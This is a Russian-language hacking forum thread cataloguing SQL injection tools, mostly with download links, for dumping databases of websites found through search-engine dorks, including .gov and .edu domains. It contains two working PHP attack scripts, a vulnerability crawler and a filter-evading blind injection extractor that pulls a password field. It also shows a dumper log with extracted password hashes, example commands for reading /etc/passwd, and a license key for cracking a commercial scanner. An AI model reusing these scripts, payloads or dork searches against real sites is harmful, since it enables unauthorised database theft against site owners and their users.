ExploitMyUnion Написанная на Python (+PyQt) тулза для автоматизации эксплуатирования SQL Injection. Скачать: http://www.sendspace.com/file/gbxaa1 ---------------------------------------------------------------------------------------------------------------------------------- BSQL Hacker Новое мощное средство для проведения инъекций в самые разнообразные виды баз, причём даже не разных веток, а семейств. В первую очередь предназначено для людей, не сильно опытных. Поддерживаются 4 вида SQL-инъекций: Blind SQL Injection, Time Based Blind SQL Injection, Deep Blind (based on advanced time delays) SQL Injection и распознавание уязвимости по выводу соответствующей ошибки базы на WEB-ресурсе. BSQL способен производить попытки инъекции, используя куки, POST-запросы, модифицированные HTTP-заголовки. Скачать: http://www.sendspace.com/file/624jhg ---------------------------------------------------------------------------------------------------------------------------------- SQL/XSS/LFI/RFI Scanner Ищет уязвимости SQL, XSS, LFI, RFI В поле Dork вставляем запрос типа Code: index.php?id= trainers.php?id= buy.php?category= article.php?ID= play_old.php?id= В архиве есть список Если поставить галочку на Get From All Domians значти что искать будем скули с любыми доменами Хоп! и короче видим рабочие скули Если вставить в поле .com, то все домены будут соm кагбэ Скачать: http://narod.ru/disk/26438803000/ExploitScanner.rar.html (c) описание by Dr..VATSON---------------------------------------------------------------------------------------------------------------------------------- Netsparker Community Edition Одна из ведущих коммерческих разработок для поиска и эксплуатирования уязвимостей в веб-приложениях. Представлена бесплатная версия для Community. Скачать: http://www.sendspace.com/file/gswl2u P.S. данная тема создана для каталогизации всего софта предназначенного, для работы с SQL Injection. А так же чтобы все разрозненные темы подобного содержания, находились в одном месте. P.P.S. убедительная просьба весь софт заливать исключительно на [sendspace.com]. Это наиболее удобный во всех отношениях ФО.
InjectoR Программа для кодирования исходного текста в ASCII коды пригодится когда magic_gpc_quotes=On Кодер: SMERSH Скачать: http://www.sendspace.com/file/zea3i2 тулзу юзаю примерно 2 года )
Havij 1.13 Особенности: Поддерживаемые базы данных с инъекционными методами: MsSQL 2000/2005 с ошибкой MsSQL 2000/2005 никакой ошибки (union based) MySQL (union based) MySQL слепая MySQL ошибка основана Oracle (union based) MSAccess (union based) Автоматическое обнаружение базы данных Автоматическое определение типа (строка или целое число) Автоматическое обнаружение ключевых слов (поиск разница между положительным и отрицательным ответом) Попытки различных синтаксисов инъекций Поддержка прокси Реальный результат времени Функции для замены пространства /**/,+,... от IDS и фильтры Старайтесь не использовать строки (magic_quotes аналогичные обойти фильтры) Обход незаконного союза Полный настраиваемые заголовки HTTP (например, ссылка и User Agent) Нагрузка куки с сайта для проверки подлинности Догадываясь, таблиц и столбцов в базе <5 (а также в слепых) и MSAccess Быстрое получение таблиц и столбцов для MySQL Multi нить Администратор страницы поиска Multi поток Интернет MD5 взломщика Начало Информация СУБД Как таблиц, столбцов и данных Командная executation (MSSQL только) Чтение системных файлов (MySQL только) вставки / обновления / удаления данных Скачать
Crypto SQL (Автор CodeSender https://forum.antichat.ru/member.php?u=133052) - Генерирует указанное число полей для UNION запроса - Кодирует заданную строку в Hex, Char, Aes Скачать rsaUnDumper[sql] – универсальный дампер SQL INJECTION Описание: • многопоточность (от 1 до 100 потоков); • поддержка http прокси; • система передышек (для предотвращения ддоса); • возможность дампа практически любых данных (от версии MySQL, до выборочных ячеек БД); • возможность указать свой UserAgent, Referer; • реализована система «Пауза \ Продолжить dump» (вы можете приостановить процесс, усыпить комп на ночь, а утром продолжить как ни в чем не бывало ); • реализована система повторной проверки тех запросов к серверу, при выполнении которых произошла ошибка; • отображение кол-ва потоков, работающих в данный момент; • отображение общего числа limit-ов; • отображение последнего limit-а, которому был послан запрос; • отображение кол-ва ответов, которые были записаны в файл; • автоматическая система проверки новых версий программы, теперь вы всегда будете в курсе последних обновлений; • сворачивание программы в трей (если дамп предвидится большой – незачем мозолить глаза лишними вкладками); • сохранение настроек в конфиг файл при закрытии программы и автозагрузка их при запуске; • информативные всплывающие подсказки при наведении на элементы интерфейса; Требования: установленный .Net Framework 2.0+ Mini FAQ: - запрос должен начинаться на http:// и заканчиваться конструкцией limit (подробнее во всплывающей подсказке), активное поле вывода в запросе замените на <{param}>, после чего в поле «Данные для дампа…» перечислите имена того, что нужно сдампить (например версия MySQL, пользователь MySQL, имена колонок…). Скачать [Perl] SQLinjector V2.0 by AlpHaNiX Описание: - Evasion choise - Proxy support - URL Extractor + Vuln Scanner & Checker Avaible Options : – MySQL MySQL column length calculator MySQL v4/5 MySQL target website db global infos MySQL v4/5 MySQL Full Schema Extractor MySQL v5 MySQL Data Dump MySQL v4/5 MySQL load_file fuzzer MySQL v4/5 MySQL Table_name Fuzzer MySQL v4 MySQL Column_name Fuzzer MySQL v4 – MsSQL MsSQL DB global info MsSQL Tables Extractor MsSQL Columns Extractor MsSQL Data Dumper – Vulunerability Scanner URL Extractor , SQL Vulnerability’s Scanner & Checker Скачать [Perl] Sqli scanner script by int3 Описание: - Многопоточный сканнер на наличие SQL Инъекций - Поддержка прокси - Сканирует по списку URL из файла Скачать Sql injection scanner by Pr0xY (Sh3ll.Team) PHP: <?php #Sh3ll.Team 2008-08-28 #Sql injection scanner by Pr0xY $http = ''; if($http == '') die("Http is empty!\n\n<b>Powered by Pr0xY</b>\n# Sh3ll.Team [2008-09-02]"); echo "Scan for : <b>$http</b> \n\n"; $http = (substr($http, -1) != '/') ? $http.'/' : $http; $found = getGet(); function getGet() { global $http; $getN = array(); $fenN = array(); $htm = @file_get_contents($http); @preg_match_all('/((\/[a-zA-Z0-9]+\/)|)([a-zA-Z0-9]+\.[a-zA-Z0-9]+\?)([a-zA-Z0-9]+)(\s*\=)([a-zA-Z0-9]+)/im', $htm, $gets); foreach($gets[0] as $get) { $get = str_replace($http, '', $get); if(!in_array($get, $getN)) { @preg_match_all('/(.*)(\?)/', $get, $gn); $name = str_replace('?', '', $gn[1][0]); if(!@in_array($name, $fenN) && @in_array(substr(strrchr($name, "."), 1), array('php', 'asp', 'aspx'))){ $getN[] = $get; $fenN[] = $name; } } } return $getN; } foreach($found as $get) { $address = $http.$get; $htm1 = @file_get_contents($address); $htm2 = @file_get_contents($address.'%20and%20\'a\'%20=%20\'a\''); if($htm1 == $htm2) echo $get." <b><font color=\"#1B9B1B\">SQL injection!</font></b> \n"; else echo $get." <b><font color=\"#D80404\">Failed!</font></b> \n"; } echo "\n\n<b>Powered by Pr0xY</b>\n"; ?> Absinthe 1.4.1 (Windows, Linux) Описание: - Автоматизированная утилита для проведения атак класса SQL-injection. - Поддержка MS SQL Server, MSDE, Oracle, Postgres. - Эксплуатация инъекций различными способами (GET,POST,COOKIE). - Возможность использования SSL. - Прокси. - Поддержка Blind, Error Based. - Вывод лога работы в файл. Скачать (Версия для Windows) Скачать (Версия для Linux) MySQL Dump v 1.0 (Coded By Flash http://h4cky0u.org) Описание: - Дамп базы через MySQL инъекцию. - Парсер уязвимых дорков. - Сканнер спарсенных URL на наличие SQL инъекций - Опциональный выбор поисковика, через который будут парситься дорки (Google, Yahoo, Live Search, Altravista, Terravista). - Выставление задержек. - Поддержка GET,POST. - Конвертер Hex, Char. - Поиск MD5 хэша по онлайн базам. Скачать SQL checker by Acid Version 1.4 (http://forum.xaknet.ru/member.php?u=41587) Описание: - Парсит поисковики, находит ссылки и сохраняет их в файл, затем проверяет этот файл на наличие SQL инъекций, и если таковые обнаружены, то раскручивает скулю до вида: "http://site.com/cart.php?id=23-1999+union+select+1,2,3,4,5,6,7,8--". - Парсит по заданному списку дорков или рандомно - Встроенный парсер bing.com - Многопоточный - Прогресс бар Скачать Скрипт для раскрутки MySQL Blind Инъекций без пробелов и запятых (Автор v1d0q https://rdot.org/forum/member.php?u=322) PHP: <?php function send_xpl($url, $xpl){ $u=parse_url($url); $req ="GET ".$u['path']."/".$xpl." HTTP/1.1\r\n"; $req.="Host: ".$u['host']."\r\n"; $req.="Connection: Close\r\n\r\n"; $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n"); fwrite($fs, $req); while (!feof($fs)) { $res .= fread($fs, 8192); } fclose($fs); return $res; } function xpl($field, $condition, $pos){ global $from; $xpl="?id=(155)and(lower(ascii(substring((select($field)$from)from($pos)for(1)))))$condition/*"; return $xpl; } function cond($url, $field, $cond, $pos, $ch) { global $tfind; if(preg_match('/'.$tfind.'/', send_xpl($url, xpl($field,$cond.$ch,$pos)))) return 1; else return 0; } function getChar($url, $field, $pos, $lb=0, $ub=255) { while(true) { $M = floor($lb + ($ub-$lb)/2); if(cond($url, $field, '<', $pos, $M)==1) { $ub = $M - 1; } else if(cond($url, $field, '>', $pos, $M)==1) { $lb = $M + 1; } else return chr($M); if($lb > $ub) return -1; } } $tfind="textfromtruequery"; $url="http://site.ru"; $field="pwd"; //всегда должно быть тру. $from="from(db.table)where(login=0x61646d696e)"; if(preg_match('/'.$tfind.'/', send_xpl($url, xpl("version()",">1",1,$from)))) { echo "works\r\n"; } else die("check sql query"); for($i=1;$i<=100;$i++) { $c = getChar($url, $field, $i, 46, 122, $from); if($c==-1) die("\r\nend"); else echo $c; } ?> [Perl] MySQL injector by Login - Root Описание: - Подбор количества столбцов - Hex значений при magic_quotes - on - Вывод таблиц, колонок, баз, попытка чтения /etc/passwd/ через load_file() и тд Вывод работы скрипта: Скачать MsSQL Injection Helper v 1.0 Скачать MsSQL Injection Helper v 1.1 Скачать SQL Injection Finder Описание: - Парсит сайты подверженные SQL инъекциям по указанному дорку Скачать
SQL Injector By Dr.Z3r0 (PHP) (https://rdot.org/forum/member.php?u=21) Описание: - Скрипт проверяет переданный ему линк на скуль иньекты (по средствам BENCHMARK). После того, как скуль иньект обнаружен, скрипт определяет количество полей, выводимое поле, и если версия MySQL5 выводит дамп information_schema. - Умеет обходить фильтрацию кавычек, пробелов и основных ключевых операторов. Юзать так: script.php?link=http://test.ru/news.php?id=1 Где http://test.ru/news.php?id=1 - ссылка для проверки на инъект Скачать Blind SQL Injector By Lukmus (Ruby) (https://forum.antichat.ru/member.php?u=104387, http://blog.lukmus.ru) Описание: - Многопоточный скрипт для проведения Blind MySQL инъекций - Подбор символов через их ASCII коды - Вычисляет паралельно несколько символов, количество которых, равно количеству потоков заданных в конфигурационном файле. Скачать Blind SQL Injection Dumper v1.1 By Shadow (Win32 Console) (https://rdot.org/forum/member.php?u=12) Описание: 1. Возникает сложность при использовании большой и сложной конструкции запроса, особенно при переборе с использованием LIMIT. Утилита с ключом -q позволяет автоматизировать этот процесс. На вход подаете SQL запрос к какой нибудь таблице, прога добавляет условно бесконечный LIMIT на выходе получаете дамп на консоли и в файле. 2. При чтении файла данным способом вывод ограничивается 64 символами. Утилита с ключом -f позволяет автоматизировать этот процесс и дампить файл блоками по 64 символа. На вход подаете полный путь до файла который нужно сдампить с целевого хоста, на выходе получаете дамп в файле. Синтаксис: BlindSQLiDumper.exe [full path whith vuln param] -[q,f [param]] [file out(default result.txt)] -q [sql query to unlimit repeat] -f [full path to filename for download] Пример для дампа данных: BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -q "select table_name from information_schema.tables" tables.txt Пример для дампа файла: BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -f /etc/passwd passwd Особенности: 1. Имя хоста без http:// 2. SQL запрос обязательно в кавычках. 3. По умолчанию создается файл result.txt в текущей дире. 4. Имя файла без кавычек, т.к. автоматически преобразует в hex эквивалент. 5. Естественно необходим file_priv = Y Лог работы: HTML: ======================== Blind SQL Injection Dumper by [53x]Shadow for Antichat.ru Based on Qwazar Fast Blind SQL Injection Method Need MySQL version >= 5.0.* ======================== start... sql query: select password from users query result: 358fa3824cfe5ac363f5ec254eafff57 acd455efd4541bf9b2e05f895c957e83 Dump stopped! Скачать SQL Scanner By Oxygenique (VB6) Описание: - Чекер выдачи поисковиков на SQL инъекции, путем подставления кавычки в целевой запрос. Скачать
WebCruiser - Web Vulnerability Scanner V2.4.2 Описание: * Crawler(Site Directories And Files); * Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.; * SQL Injection Scanner; * SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept); * SQL Injection for SQL Server: PlainText/Union/Blind Injection; * SQL Injection for MySQL: PlainText/Union/Blind Injection; * SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection; * SQL Injection for DB2: Union/Blind Injection; * SQL Injection for Access: Union/Blind Injection; * Post Data Resend; * Cross Site Scripting Scanner and POC; * XPath Injection Scanner and POC; * Auto Get Cookie From Web Browser For Authentication; * Report Output. Скачать линк лекарство от жадности: st0p.org 9EF6-CC8C-F068-B1D6 Standalone NoMore AND 1=1 v04 Описание: хороший сборник/помошник готовых запросов для пентестинга(не только SQL injection) Скачать линк вторая ссыл http://upwap.ru/1133629 перезалил еше на другой фо дабы некоторые не смогли качать последнюю, но у мну качается
Linux tools Linux tools Blind SQL Injection Perl Tool Blind SQL Injection Perl Tool (bsqlbf) - небольшой скриптик на Perl для извлечения информации из баз данных сайтов, уязвимых к sql-инъекциям. Скачать: http://www.sendspace.com/file/kexay0 FG Injector 0.9a FG-Injector - открытый фреймворк, призванный помочь в поиске уязвимостей класса sql-injection в веб-приложениях. Включает в себя встроенный прокси для перехвата и модификации HTTP-запросов, а также интерфейс для автоматической эксплуатации уязвимостей. Скачать: http://www.sendspace.com/file/y6ugyu MySqloit 0.2 MySqloit - утилита для проведения sql-инъекций на LAMP (Linux, Apache, MySQL, PHP) и WAMP (Windows, Apache, MySQL, PHP) платформах. Умеет загружать и выполнять шеллкоды из Metasploit Framework через SQL-Injection уязвимости в MySql. Скачать: http://www.sendspace.com/file/6wr6sv SQID 0.3 SQLID (SQL Injection digger) - консольная программка для автоматизации поиска и эксплуатации sql-инъекций и других ошибок. Ищет инъекции на веб-страницах, а также тестирует все поля для ввода на наличие возможных уязвимостей к инъекции. Скачать: http://www.sendspace.com/file/6951a9 SQL Power Injector 1.2 SQL Power Injection - инструмент, помогающий пентестеру выполнять SQL команды через уязвимую страницу. Его основное заключается в способности автоматизировать и ускорить "слепые" инъекции за счет распараллеривания на несколько потоков. Скачать: http://www.sendspace.com/file/13pbab Sqlbftools 1.2 SQLbftools - набор инструментов для извлечения информации из MySQL-базы данных при помощи "слепой" sql-инъекции. Скачать: http://www.sendspace.com/file/16crex SQLBrute SQLBrute - инструмент для извлечения данных из БД при помощи "слепых" sql-инъекций. Использует брут по времени ответа сервера и по возвращенной сервером ошибке для Microsoft SQL Server, и брут по ошибке для Oracle. Написан полностью на Python, многопоточен и не требует установки дополнительных библиотек. Скачать: http://www.sendspace.com/file/6owsla SQLIer 0.8.2b SQLIer - принимает в качестве входных данных уязвимую к инъекции URL и пытается определить всю необходимую информацию для построения ядовитого запроса к БД. Почти не требует участия пользователя (в случае, если программа не смогла корректно определить имя таблицы/поля, пользователю все же приходится помочь ей). Строит UNION SELECT запросы для извлечения паролей из базы. Скачать: http://www.sendspace.com/file/0eq575 Sqlmap 0.8 Утилита, написанная на языке Python, предназначенная для автоматизации так называемых слепых SQL инъекций. Поддерживает MySQL, PostgreSQL и Microsoft SQL Server. Скачать: http://www.sendspace.com/file/qoid5u SQLNinja 0.2.3 Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В новой версии можно выделить такие изменения, как оптимизацию брутофорс-метода, возможность использования пробела в строках эксплоита и установку исходного значения FQDN, равное 250. Скачать: http://www.sendspace.com/file/e0cwks
Havij v1.14 Advanced SQL Injection Tool Havij v1.14 Advanced SQL Injection tool. Новые возможности этой версии: * Sybase (ASE) базы данных добавил. * Sybase (ASE) Слепой базы данных добавил. * Время метода, основанного на MsSQL добавил. * Время метода, основанного на MySQL добавил. * Mod_security обойти добавил. * Пауза добавлена кнопка. * Обычная проверка подлинности добавил * Выборочная проверка подлинности добавил. * Сообщение данных поля добавил * Ошибки, связанные с символа точки в имени базы данных фиксированной * Синтаксис более писать, когда определяется пользователем в слепой инъекции фиксированной. * Обнаружение MSSQL базы данных от ошибок при использовании JDBC драйвера исправлена. * Тайм-аут ошибка в md5 взломщик фиксированной. * Значение по умолчанию исправлена ошибка * Строка кодирования исправлена ошибка в PostgreSQL * Инъекционных URL переписать страницы добавил. * Введения в любую часть HTTP-запрос вида печенья, User-Agent, Referer, и т.д. доступны * Ошибка в поиске строку столбца фиксированной. (Специально для MySQL) * Поиск столбцов кол в MySQL, когда входное значение не является эффективным добавил. * Размера окна ошибку в пользовательских точек на дюйм фиксированной. * Некоторые ошибки в поиске количество строк фиксированной. * Получение имя базы данных в MSSQL ошибка основана при инъекции типа угадывается целое, но это строка фиксированной. ITSecTeam.com
Safe3 SQL Injector Полезный инструмент пентестера, позволяющий реализовывать инъекции в MySQL, Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase, Sqlite, с помощью Error/Union/Blind/Force SQL injection техник. При этом тулза может проверить на стойкость WAF (Web Application Firewall) на стороне сервера. Скачать: http://www.sendspace.com/file/avza1j Context App Tool Комплекс для полуавтоматического пентеста, включающий ряд полезных инструментов. Работает в зависимости "от контекста" - отсюда и название. Один из них - модули для обнаружения SQL- и XSS-инъекций, а также фаззинг форм для обнаружения CRSF багов. Скачать: http://www.sendspace.com/file/kyc5n3 ESF Инструмент для определения версий Microsoft SQL Server 2000, Microsoft SQL Server 2005 и Microsoft SQL Server 2008. Особенностью программы является не "сырое" отображение версии, а привязка ее к определенному сервис паку и релизу. Таким образом, ESF может подсказать, какие патчи еще не установлены. Скачать: http://www.sendspace.com/file/ly8pzt Grendel-Scan Перед нами кроссплатформенный сканер для поиска уязвимостей в веб-приложениях. Среди задач во время разработчики обозначили: полную кроссплатформенность, GUI для всех ОС, отсутствие зависимостей (кроме Java), обнаружение и использование найденных уязвимостей. В итоге со всеми требованиями у них получилось выпустить довольно универсальный сканер, включающий: встроенный прокси для перехвата данных фаззер HTTP-запросов, в том числе собранных полностью вручную модуль для SQL injection CRLF injection Cross-site request forgery (CSRF) обнаружение скрытых директорий (Directory traversal) модуль для выяснения данных о жертве (обработка Robots.txt, ошибок системы и т.д.) пентест конфигурации веб-демона (Cross-site tracing, Proxy detection) В общем-то, это был бы самый обычный сканнер, если бы не реализация некоторых редких видов атак, вроде разновидности XSS – cross-site request forgery. Скачать: http://www.sendspace.com/file/joz59q Hexjector Открытая разработка для автоматизированного поиска ошибок в скриптах, которые могут привести к SQL-инъекциям. Скачать: http://www.sendspace.com/file/5h6qiu
rsaUnDumper[sql] 2.0– универсальный дампер SQL INJECTION Описание: Отличия от версии 1.5: • Добавлена возможность редактирования заголовков • Работа через POST • Поддержка SOCKS4/SOCKS5 прокси Требования: установленный .Net Framework 2.0+ Скачать
sqlinject-finder Этот небольшой скрипт предназначен для поиска SQL-injection по pcap-файлам снифера. Скрипт смотрит в GET- и POST-запросах возможные места для проведения атаки и выводит отчет в понятном виде. Помимо существующей базы проверок достаточно просто добавить и свои правила. Программа очень полезна при расследовании инцидентов, если необходимо определить, как злоумышленник проник в систему, и закрыть уязвимость. Скачать: http://www.sendspace.com/file/og8afs SFX-SQLi Описание техники инъекций (Select For XML SQL injection) и утилита для ее реализации. Техника основана на ошибке в FOR XML, позволяющей конвертировать все содержание таблицы в одну строчку, и позволяет извлечь дамп данных из Microsoft SQL Server 2005/2008. Скачать: http://www.sendspace.com/file/hvghaz http://www.sendspace.com/file/44mn6k [source code] http://www.sendspace.com/file/dojcle [описание техники] ProxyStrike Помощник для пентеста приложений, реализованный в виде прокси. На данном этапе развития имеет модули для реализации SQL-Inj и XSS. Скачать: http://www.sendspace.com/file/p6afel www.youtube.com/watch?v=l8kioy4QX7U [video manual] SecuBat Сканнер безопасности, заточенный для анализа веб-сайтов на наличие Sql-инъекций и XSS. Скачать: http://www.sendspace.com/file/alfvwr WITOOL Тулза для реализации SQL-инжекций в SQL Server и Oracle c GUI-интерфейсом, написанная на .NET (а потому требующая установленный в системе фреймворк). Скачать: http://www.sendspace.com/file/c074hh
sqlsus Специальная утилита для реализации инъекций в базы данных MySQL. С помощью sqlsus ты намного проще сможешь эксплуатировать найденный баг, получив структуру базы, внедрив SQL-запрос, скачав с сервера нужные файл, закачав бэкдор и т.д., и т.п. Примечательно, что в качестве инструмента для хранения полученных дампов используется база SQLite, что чрезвычайно удобно. Можно, например, сделать копию базы, переместив таблицы или колонки с уязвимого сервера себе в локальную базу на SQLite и полноценно работать с ней. Если ты не можешь обратиться к базе information_schema, или если ее не существует, тулза поможет пробрутфорсить название таблиц и колонок. sqlsus поможет реализовать и blind-инъекции. Скачать: http://dl.dropbox.com/u/20490401/sqlsus-0.5rc1.tgz Paros Этот хитрый прокси-сервер, написанный на JAVA, позволяет тестировать веб-приложения на наличие распространенных ошибок. Порой подмена referer'a обеспечивает прямой доступ к админке, а неправильно составленная кука совершенно непредсказуемо обрабатывается. С помощью Paros ты можешь «на лету» изменять исходящие HTTP/HTTPS запросы, логировать собственный траф, проверять сайты на наличие SQL Injection и XSS уязвимостей с помощью встроенных специальных утилит. Получаем сканнер и MITM proxy в одном лице! Думаю, ты поймешь, что можно творить с помощью Paros. Скачать: http://dl.dropbox.com/u/20490401/paros-3.2.13-win.exe w3af w3af - это фреймврок для поиска и эксплуатации атак на веб-приложения. Что-то вроде Metasploit, но в контексте веб-приложений. w3af состоит из ядра и плагинов, который пишутся на Python'е. Сейчас в проект включены более 130 аддонов, реализующие проверки и эксплуатацию SQL инъекций, xss, локальный и удаленные инклуды и т.д. Скачать: http://dl.dropbox.com/u/20490401/w3af-1.0-rc3.exe
WebCruiser - Web Vulnerability Scanner Автоматизированный сканнер безопасности веб-проектов. Включает в себя паука (crawler), исследующего структуру каталогов, механизмы для поиска разного типа уязвимостей (SQL Injection, Cross Site Scripting, XPath Injection и т.д.), инъектор данных в GET/Post запросы и кукисы, а также другие места. Скачать: http://dl.dropbox.com/u/20490401/WebCruiser.zip Wfuzz Универсальная программа для пентеста веб-приложений. Включает в себя брутфорсер форм, GET- и POST-запросов, сканнер для поиска инжекций (SQL, XSS, LDAP), универсальный фаззер для использования в веб-среде. Скачать: http://dl.dropbox.com/u/20490401/wfuzz-1.4b-win.tar.gz WebSlayer Основная цель приложения – брутфорс различных мест в веб-приложениях. Скачать: http://dl.dropbox.com/u/20490401/WebSlayer-Beta.msi
Слепой кот The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected. Скачать: http://dl.dropbox.com/u/20490401/blind_cat.zip http://dl.dropbox.com/u/20490401/blind_cat_source.zip [source] Видео демонстрации возможностей: http://www.youtube.com/watch?v=Dkp4artwJnE
SQLi Checker SQLi Checker SQLi Checker – программа для проверки списка URL’ов на наличие уязвимостей типа SQL Injection Функционал: Многопоточность (программно) Поддержка HTTP(s) прокси Поддержка SSL Пример source: Code: http://site.com/index.php?id=1 http://site.com/index.php?inc=ololo&id=1 … Скачать SQLi Checker Источник i-pro.name
Subgraph Vega Vulnerability Scanner Описание: Vega это платформа с открытым исходным кодом для тестирования безопасности веб-приложений. Vega поможет вам найти такие уязвимости как SQL-инъекции, Cross-Site Scripting (XSS), обнаружить раскрытие конфиденциальной информации, а также другие уязвимости. Приложение написано на языке Java, имеет GUI интерфейс и доступно на Linux, OS X и Windows. Официальный сайт: subgraph.com
Парсер дорков Google,Yahoo,Bing Search Engine Scraper V0.2 + Работает с прокси + Возможность закгрузки кейвородов (дорков) из списка + Возможность выбрать домен поисковой системы(RU,DE...) + Возможность выбрать язык + PR checker - Подвисает Источник:bottopia.com Скачать VT http://www.virustotal.com/file-scan/report.html?id=198ca5aa01185322588c0653dfe71ec4ea6b15b057ec21a320e26b1f980f04b1-1323456012
NTO SQL Invader Описание (оригинал): NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database. Easy to use - The tool’s GUI interface enables you to simply paste the injectable request found by a DAST tool or feed a detailed request straignt from an application scan report. You can then control how much information is harvested. Clearly presents evidence - Unlike tools that provide all data via command line, NTO SQL Invader provides the data in a organized manner that is useful for both executive meetings as well as technical analysis and remediation. Enables easy transport of logging data - All of the data harvested from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or POC. В общем еще 1 программа для раскрутки SQL Injection. Может кому будет полезна. Официальный сайт программы: NTObjectives Скачать: NTO SQL Invader
Vulnerable site finder v1.1 Vulnerable site finder v1.1 Code: Hey CHF Here is my latest tool "Exploit Scanner Tool" witch will allow you to search google for links then scan them links for vulnerabilities. After a pretty successful release of the beta version of "Vulnerable site finder beta" i made a new version "v1.1" New features: - Faster scanning - Site domains Eg .gov .edu - Progress bar bug fixed - Import urls list - Export links before and after scanning them Видео по работе scan : https://www.virustotal.com/file/b2c171f32e7a50413303f931d415471fbb7e43ad3ebcb5b36647ec46b68b2a15/analysis/1328461692/ download at: http://gartland1.co.uk/?p=104 http://www.sendspace.com/file/y3zlll http://upwap.ru/2035282 http://keep2.me/fd34336
Vulnerable site finder v1.2 (SQLi Scanner) Code: Hey CHF[/CENTER] [CODE]- Faster scanning - Site domains Eg .gov .edu - Progress bar bug fixed - Import urls list - Export links before and after scanning them - Custon error’s - Custom site’s - Updater - No scan limit - Comes with 10k + dorks Code: VT https://www.virustotal.com/file/c98a2e90c436f86daf363561751b8cf69536852d5682861bd0b26204ff357d1b/analysis/1328897424/ http://www.mediafire.com/?mzdkw9onbbwu05b
